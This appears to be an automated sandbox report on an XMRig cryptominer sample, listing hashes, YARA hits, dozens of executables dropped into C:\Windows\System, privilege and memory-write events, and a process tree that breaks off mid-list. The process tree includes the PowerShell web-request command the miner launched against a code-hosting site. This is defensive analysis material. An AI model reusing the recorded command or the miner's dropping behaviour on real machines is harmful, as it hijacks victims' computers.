xmrig | 2be26ebade348173855700f0b210e41d4865116974e0f750a50cb3a923fff006

Analysis

max time kernel
95s
max time network
122s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
13/05/2024, 17:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
Size

1.5MB
MD5

bfb5375321f6eff8eaf25449e2162650
SHA1

1c9431af42bd6d34d28cc23fa5d85fa62a8d8812
SHA256

2be26ebade348173855700f0b210e41d4865116974e0f750a50cb3a923fff006
SHA512

dd314166156e31c27ad545ee02b97aff9082ac830072ab85fed8754e4618714ace9890818171b14f882dbc191159f2d37abd7b2a7347e7e9f09cefec71fad8f1
SSDEEP

24576:zv3/fTLF671TilQFG4P5PMkUCCWvLEvjpbc8nJwbomvu2Nrl6:Lz071uv4BPMkHC0IBcAUNw

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 49 IoCs

miner

resource	yara_rule
behavioral2/memory/1996-96-0x00007FF6AFB80000-0x00007FF6AFF72000-memory.dmp	xmrig
behavioral2/memory/8-88-0x00007FF6F2C30000-0x00007FF6F3022000-memory.dmp	xmrig
behavioral2/memory/3680-87-0x00007FF7A10C0000-0x00007FF7A14B2000-memory.dmp	xmrig
behavioral2/memory/3260-82-0x00007FF6A7A40000-0x00007FF6A7E32000-memory.dmp	xmrig
behavioral2/memory/924-77-0x00007FF6DD5C0000-0x00007FF6DD9B2000-memory.dmp	xmrig
behavioral2/memory/4948-71-0x00007FF7A31D0000-0x00007FF7A35C2000-memory.dmp	xmrig
behavioral2/memory/2900-61-0x00007FF7BE660000-0x00007FF7BEA52000-memory.dmp	xmrig
behavioral2/memory/4704-450-0x00007FF74E220000-0x00007FF74E612000-memory.dmp	xmrig
behavioral2/memory/1364-56-0x00007FF6C7190000-0x00007FF6C7582000-memory.dmp	xmrig
behavioral2/memory/2248-451-0x00007FF78E300000-0x00007FF78E6F2000-memory.dmp	xmrig
behavioral2/memory/1236-13-0x00007FF690AE0000-0x00007FF690ED2000-memory.dmp	xmrig
behavioral2/memory/1012-454-0x00007FF671E00000-0x00007FF6721F2000-memory.dmp	xmrig
behavioral2/memory/4924-485-0x00007FF7005A0000-0x00007FF700992000-memory.dmp	xmrig
behavioral2/memory/1404-504-0x00007FF7A6D80000-0x00007FF7A7172000-memory.dmp	xmrig
behavioral2/memory/2708-511-0x00007FF756740000-0x00007FF756B32000-memory.dmp	xmrig
behavioral2/memory/3304-547-0x00007FF662F10000-0x00007FF663302000-memory.dmp	xmrig
behavioral2/memory/4796-535-0x00007FF6D2310000-0x00007FF6D2702000-memory.dmp	xmrig
behavioral2/memory/4712-531-0x00007FF788880000-0x00007FF788C72000-memory.dmp	xmrig
behavioral2/memory/1748-526-0x00007FF783700000-0x00007FF783AF2000-memory.dmp	xmrig
behavioral2/memory/1140-515-0x00007FF7BEC30000-0x00007FF7BF022000-memory.dmp	xmrig
behavioral2/memory/3716-477-0x00007FF64A1A0000-0x00007FF64A592000-memory.dmp	xmrig
behavioral2/memory/2704-464-0x00007FF68C620000-0x00007FF68CA12000-memory.dmp	xmrig
behavioral2/memory/1992-459-0x00007FF7FB170000-0x00007FF7FB562000-memory.dmp	xmrig
behavioral2/memory/4960-455-0x00007FF7AAAC0000-0x00007FF7AAEB2000-memory.dmp	xmrig
behavioral2/memory/1236-2998-0x00007FF690AE0000-0x00007FF690ED2000-memory.dmp	xmrig
behavioral2/memory/1236-3002-0x00007FF690AE0000-0x00007FF690ED2000-memory.dmp	xmrig
behavioral2/memory/1364-3004-0x00007FF6C7190000-0x00007FF6C7582000-memory.dmp	xmrig
behavioral2/memory/4948-3008-0x00007FF7A31D0000-0x00007FF7A35C2000-memory.dmp	xmrig
behavioral2/memory/1404-3007-0x00007FF7A6D80000-0x00007FF7A7172000-memory.dmp	xmrig
behavioral2/memory/2900-3011-0x00007FF7BE660000-0x00007FF7BEA52000-memory.dmp	xmrig
behavioral2/memory/1140-3019-0x00007FF7BEC30000-0x00007FF7BF022000-memory.dmp	xmrig
behavioral2/memory/3680-3020-0x00007FF7A10C0000-0x00007FF7A14B2000-memory.dmp	xmrig
behavioral2/memory/924-3022-0x00007FF6DD5C0000-0x00007FF6DD9B2000-memory.dmp	xmrig
behavioral2/memory/3260-3017-0x00007FF6A7A40000-0x00007FF6A7E32000-memory.dmp	xmrig
behavioral2/memory/2708-3015-0x00007FF756740000-0x00007FF756B32000-memory.dmp	xmrig
behavioral2/memory/8-3013-0x00007FF6F2C30000-0x00007FF6F3022000-memory.dmp	xmrig
behavioral2/memory/4960-3033-0x00007FF7AAAC0000-0x00007FF7AAEB2000-memory.dmp	xmrig
behavioral2/memory/4704-3051-0x00007FF74E220000-0x00007FF74E612000-memory.dmp	xmrig
behavioral2/memory/1012-3049-0x00007FF671E00000-0x00007FF6721F2000-memory.dmp	xmrig
behavioral2/memory/1748-3047-0x00007FF783700000-0x00007FF783AF2000-memory.dmp	xmrig
behavioral2/memory/4712-3043-0x00007FF788880000-0x00007FF788C72000-memory.dmp	xmrig
behavioral2/memory/1996-3041-0x00007FF6AFB80000-0x00007FF6AFF72000-memory.dmp	xmrig
behavioral2/memory/4796-3039-0x00007FF6D2310000-0x00007FF6D2702000-memory.dmp	xmrig
behavioral2/memory/3304-3037-0x00007FF662F10000-0x00007FF663302000-memory.dmp	xmrig
behavioral2/memory/2248-3035-0x00007FF78E300000-0x00007FF78E6F2000-memory.dmp	xmrig
behavioral2/memory/1992-3030-0x00007FF7FB170000-0x00007FF7FB562000-memory.dmp	xmrig
behavioral2/memory/3716-3029-0x00007FF64A1A0000-0x00007FF64A592000-memory.dmp	xmrig
behavioral2/memory/4924-3027-0x00007FF7005A0000-0x00007FF700992000-memory.dmp	xmrig
behavioral2/memory/2704-3025-0x00007FF68C620000-0x00007FF68CA12000-memory.dmp	xmrig

Blocklisted process makes network request 7 IoCs

flow	pid	Process
3	2124	powershell.exe
5	2124	powershell.exe
9	2124	powershell.exe
10	2124	powershell.exe
12	2124	powershell.exe
13	2124	powershell.exe
15	2124	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2124	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
1236	hmohMpn.exe
1364	PverIme.exe
1404	nHhXoCG.exe
2900	NtYUupf.exe
4948	OEomJam.exe
924	MpXBoQv.exe
2708	ZuxbUeo.exe
3260	lhHUDfD.exe
3680	eDbLvgz.exe
8	RjnPWvE.exe
1140	WkRgjcR.exe
1748	uXRaylF.exe
1996	ikPgqbl.exe
4712	CeLzsoj.exe
4796	prUMRrC.exe
3304	GzoJYPU.exe
4704	brDcHUg.exe
2248	jwKlQbJ.exe
1012	iSlhmQd.exe
4960	qtstHKZ.exe
1992	EFLWLme.exe
2704	DjxNnzC.exe
3716	QvGsYDm.exe
4924	NANvogr.exe
2240	rdxtgpd.exe
4584	FPYUgkD.exe
5104	fwWEQaJ.exe
3968	KbIdiVI.exe
416	zGAZmMf.exe
4740	PQPfgAs.exe
4724	lemPovn.exe
1388	YnumAte.exe
2336	QxPaDAz.exe
4052	ODIdlbu.exe
3352	KethDvB.exe
3484	UbDrqhs.exe
4804	OlWEPcj.exe
4236	sExcNZz.exe
4272	OWERtmK.exe
2392	mWlWErY.exe
1724	SoOWYcb.exe
4088	XAgkhoV.exe
1520	McnfZWy.exe
4648	JCkcBrg.exe
3024	fXpsALs.exe
4428	SXOzNfh.exe
4404	wqyLyBi.exe
800	qWbpZAQ.exe
4736	JPCmswa.exe
3936	hdyZnsu.exe
5112	tPELhxR.exe
1124	BOXRPgG.exe
4628	baJTOhE.exe
1688	DwGqWnx.exe
3400	REPfuQp.exe
4792	MVBTPMA.exe
4024	VqloNws.exe
4608	auvkmgg.exe
4524	kLKzMCn.exe
964	EUhgkZV.exe
2324	DCWlnKH.exe
3492	UHgYthP.exe
4176	TDHeUil.exe
744	kOZPQKb.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3268-0-0x00007FF785300000-0x00007FF7856F2000-memory.dmp	upx
behavioral2/files/0x0008000000023402-9.dat	upx
behavioral2/files/0x0007000000023403-15.dat	upx
behavioral2/files/0x0007000000023404-21.dat	upx
behavioral2/files/0x0007000000023406-28.dat	upx
behavioral2/files/0x0007000000023405-39.dat	upx
behavioral2/files/0x0007000000023407-47.dat	upx
behavioral2/files/0x000700000002340a-51.dat	upx
behavioral2/files/0x0007000000023409-57.dat	upx
behavioral2/files/0x000700000002340f-78.dat	upx
behavioral2/files/0x000800000002340e-84.dat	upx
behavioral2/files/0x0007000000023410-102.dat	upx
behavioral2/files/0x00090000000233fc-117.dat	upx
behavioral2/files/0x0007000000023413-127.dat	upx
behavioral2/files/0x0007000000023417-139.dat	upx
behavioral2/files/0x0007000000023418-152.dat	upx
behavioral2/files/0x000700000002341f-179.dat	upx
behavioral2/files/0x0007000000023420-184.dat	upx
behavioral2/files/0x000700000002341e-182.dat	upx
behavioral2/files/0x000700000002341d-177.dat	upx
behavioral2/files/0x000700000002341c-172.dat	upx
behavioral2/files/0x000700000002341b-167.dat	upx
behavioral2/files/0x000700000002341a-162.dat	upx
behavioral2/files/0x0007000000023419-157.dat	upx
behavioral2/files/0x0007000000023416-142.dat	upx
behavioral2/files/0x0007000000023415-137.dat	upx
behavioral2/files/0x0007000000023414-132.dat	upx
behavioral2/files/0x000800000002340d-122.dat	upx
behavioral2/files/0x0007000000023412-112.dat	upx
behavioral2/files/0x0007000000023411-107.dat	upx
behavioral2/memory/1996-96-0x00007FF6AFB80000-0x00007FF6AFF72000-memory.dmp	upx
behavioral2/files/0x000700000002340c-91.dat	upx
behavioral2/memory/8-88-0x00007FF6F2C30000-0x00007FF6F3022000-memory.dmp	upx
behavioral2/memory/3680-87-0x00007FF7A10C0000-0x00007FF7A14B2000-memory.dmp	upx
behavioral2/memory/3260-82-0x00007FF6A7A40000-0x00007FF6A7E32000-memory.dmp	upx
behavioral2/memory/924-77-0x00007FF6DD5C0000-0x00007FF6DD9B2000-memory.dmp	upx
behavioral2/memory/4948-71-0x00007FF7A31D0000-0x00007FF7A35C2000-memory.dmp	upx
behavioral2/memory/2900-61-0x00007FF7BE660000-0x00007FF7BEA52000-memory.dmp	upx
behavioral2/files/0x000700000002340b-60.dat	upx
behavioral2/memory/4704-450-0x00007FF74E220000-0x00007FF74E612000-memory.dmp	upx
behavioral2/memory/1364-56-0x00007FF6C7190000-0x00007FF6C7582000-memory.dmp	upx
behavioral2/files/0x0007000000023408-49.dat	upx
behavioral2/memory/2248-451-0x00007FF78E300000-0x00007FF78E6F2000-memory.dmp	upx
behavioral2/memory/1236-13-0x00007FF690AE0000-0x00007FF690ED2000-memory.dmp	upx
behavioral2/files/0x0008000000022f51-8.dat	upx
behavioral2/memory/1012-454-0x00007FF671E00000-0x00007FF6721F2000-memory.dmp	upx
behavioral2/memory/4924-485-0x00007FF7005A0000-0x00007FF700992000-memory.dmp	upx
behavioral2/memory/1404-504-0x00007FF7A6D80000-0x00007FF7A7172000-memory.dmp	upx
behavioral2/memory/2708-511-0x00007FF756740000-0x00007FF756B32000-memory.dmp	upx
behavioral2/memory/3304-547-0x00007FF662F10000-0x00007FF663302000-memory.dmp	upx
behavioral2/memory/4796-535-0x00007FF6D2310000-0x00007FF6D2702000-memory.dmp	upx
behavioral2/memory/4712-531-0x00007FF788880000-0x00007FF788C72000-memory.dmp	upx
behavioral2/memory/1748-526-0x00007FF783700000-0x00007FF783AF2000-memory.dmp	upx
behavioral2/memory/1140-515-0x00007FF7BEC30000-0x00007FF7BF022000-memory.dmp	upx
behavioral2/memory/3716-477-0x00007FF64A1A0000-0x00007FF64A592000-memory.dmp	upx
behavioral2/memory/2704-464-0x00007FF68C620000-0x00007FF68CA12000-memory.dmp	upx
behavioral2/memory/1992-459-0x00007FF7FB170000-0x00007FF7FB562000-memory.dmp	upx
behavioral2/memory/4960-455-0x00007FF7AAAC0000-0x00007FF7AAEB2000-memory.dmp	upx
behavioral2/memory/1236-2998-0x00007FF690AE0000-0x00007FF690ED2000-memory.dmp	upx
behavioral2/memory/1236-3002-0x00007FF690AE0000-0x00007FF690ED2000-memory.dmp	upx
behavioral2/memory/1364-3004-0x00007FF6C7190000-0x00007FF6C7582000-memory.dmp	upx
behavioral2/memory/4948-3008-0x00007FF7A31D0000-0x00007FF7A35C2000-memory.dmp	upx
behavioral2/memory/1404-3007-0x00007FF7A6D80000-0x00007FF7A7172000-memory.dmp	upx
behavioral2/memory/2900-3011-0x00007FF7BE660000-0x00007FF7BEA52000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
2	raw.githubusercontent.com
3	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\pvKaUDa.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\byjSxAz.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\wulBrDt.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\TlbKTdt.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\vDUPGZT.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\SOSUpJt.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\GbsNvpT.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\bmYfffR.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\LbpXRQc.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\qjFImWI.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\qEqhDiL.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\awkLFhw.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\KrGYoZs.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\nNdcuBA.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\EWcxRGN.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\aRsunHq.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\XwqtVXS.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\kRWIjUd.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\QXcgTSd.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\dRaCzHv.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\LoaXPzV.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\lxzzmPf.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\juQMHIX.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\zDrsLKE.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\ifZznnq.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\SmvZDtp.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\NNRbPJd.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\woRphsU.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\ltyETQK.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\CenPqXf.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\kJzynmD.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\igDbGdv.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\PccJGyD.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\uFbmixl.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\FucAVuQ.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\aPBogEx.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\oMjnnFs.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\MOxSVBR.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\XIrjHFc.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\FknFeNS.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\vAkWWVY.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\ytFLJZq.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\teUUYVD.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\QPuuNpu.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\PjCfgbX.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\DUGXxRY.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\ACNHQtr.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\WGoePsn.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\ZIjUYUE.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\IJkgVVZ.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\STFLypW.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\vqEqZbk.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\zkgMDNj.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\XHKDdgu.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\akMzBoU.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\DKBQLKp.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\fZxXDvO.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\PmbbNtc.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\FGjVxNI.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\CyFElrW.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\jrQlkym.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\qFczPuj.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\OklhiHp.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
File created	C:\Windows\System\TCSgtXL.exe	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2124	powershell.exe
2124	powershell.exe
2124	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
Token: SeDebugPrivilege	2124	powershell.exe
Token: SeLockMemoryPrivilege	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3268 wrote to memory of 2124	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	83
PID 3268 wrote to memory of 2124	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	83
PID 3268 wrote to memory of 1236	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	84
PID 3268 wrote to memory of 1236	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	84
PID 3268 wrote to memory of 1364	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	85
PID 3268 wrote to memory of 1364	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	85
PID 3268 wrote to memory of 1404	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	86
PID 3268 wrote to memory of 1404	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	86
PID 3268 wrote to memory of 2900	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	87
PID 3268 wrote to memory of 2900	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	87
PID 3268 wrote to memory of 924	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	88
PID 3268 wrote to memory of 924	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	88
PID 3268 wrote to memory of 4948	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	89
PID 3268 wrote to memory of 4948	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	89
PID 3268 wrote to memory of 2708	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	90
PID 3268 wrote to memory of 2708	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	90
PID 3268 wrote to memory of 3260	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	91
PID 3268 wrote to memory of 3260	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	91
PID 3268 wrote to memory of 3680	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	92
PID 3268 wrote to memory of 3680	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	92
PID 3268 wrote to memory of 8	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	93
PID 3268 wrote to memory of 8	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	93
PID 3268 wrote to memory of 1140	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	94
PID 3268 wrote to memory of 1140	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	94
PID 3268 wrote to memory of 1996	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	95
PID 3268 wrote to memory of 1996	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	95
PID 3268 wrote to memory of 1748	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	96
PID 3268 wrote to memory of 1748	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	96
PID 3268 wrote to memory of 4712	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	97
PID 3268 wrote to memory of 4712	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	97
PID 3268 wrote to memory of 4796	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	98
PID 3268 wrote to memory of 4796	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	98
PID 3268 wrote to memory of 3304	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	99
PID 3268 wrote to memory of 3304	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	99
PID 3268 wrote to memory of 4704	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	100
PID 3268 wrote to memory of 4704	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	100
PID 3268 wrote to memory of 2248	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	101
PID 3268 wrote to memory of 2248	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	101
PID 3268 wrote to memory of 1012	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	102
PID 3268 wrote to memory of 1012	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	102
PID 3268 wrote to memory of 4960	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	103
PID 3268 wrote to memory of 4960	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	103
PID 3268 wrote to memory of 1992	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	104
PID 3268 wrote to memory of 1992	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	104
PID 3268 wrote to memory of 2704	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	105
PID 3268 wrote to memory of 2704	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	105
PID 3268 wrote to memory of 3716	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	106
PID 3268 wrote to memory of 3716	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	106
PID 3268 wrote to memory of 4924	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	107
PID 3268 wrote to memory of 4924	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	107
PID 3268 wrote to memory of 2240	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	108
PID 3268 wrote to memory of 2240	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	108
PID 3268 wrote to memory of 4584	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	109
PID 3268 wrote to memory of 4584	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	109
PID 3268 wrote to memory of 5104	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	110
PID 3268 wrote to memory of 5104	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	110
PID 3268 wrote to memory of 3968	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	111
PID 3268 wrote to memory of 3968	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	111
PID 3268 wrote to memory of 416	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	112
PID 3268 wrote to memory of 416	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	112
PID 3268 wrote to memory of 4740	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	113
PID 3268 wrote to memory of 4740	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	113
PID 3268 wrote to memory of 4724	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	114
PID 3268 wrote to memory of 4724	3268	bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe	114

C:\Users\Admin\AppData\Local\Temp\bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\bfb5375321f6eff8eaf25449e2162650_NeikiAnalytics.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3268
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2124
- C:\Windows\System\hmohMpn.exe
  C:\Windows\System\hmohMpn.exe
  2⤵
  - Executes dropped EXE
  PID:1236
- C:\Windows\System\PverIme.exe
  C:\Windows\System\PverIme.exe
  2⤵
  - Executes dropped EXE
  PID:1364
- C:\Windows\System\nHhXoCG.exe
  C:\Windows\System\nHhXoCG.exe
  2⤵
  - Executes dropped EXE
  PID:1404
- C:\Windows\System\NtYUupf.exe
  C:\Windows\System\NtYUupf.exe
  2⤵
  - Executes dropped EXE
  PID:2900
- C:\Windows\System\MpXBoQv.exe
  C:\Windows\System\MpXBoQv.exe
  2⤵
  - Executes dropped EXE
  PID:924
- C:\Windows\System\OEomJam.exe
  C:\Windows\System\OEomJam.exe
  2⤵
  - Executes dropped EXE
  PID:4948
- C:\Windows\System\ZuxbUeo.exe
  C:\Windows\System\ZuxbUeo.exe
  2⤵
  - Executes dropped EXE
  PID:2708
- C:\Windows\System\lhHUDfD.exe
  C:\Windows\System\lhHUDfD.exe
  2⤵
  - Executes dropped EXE
  PID:3260
- C:\Windows\System\eDbLvgz.exe
  C:\Windows\System\eDbLvgz.exe
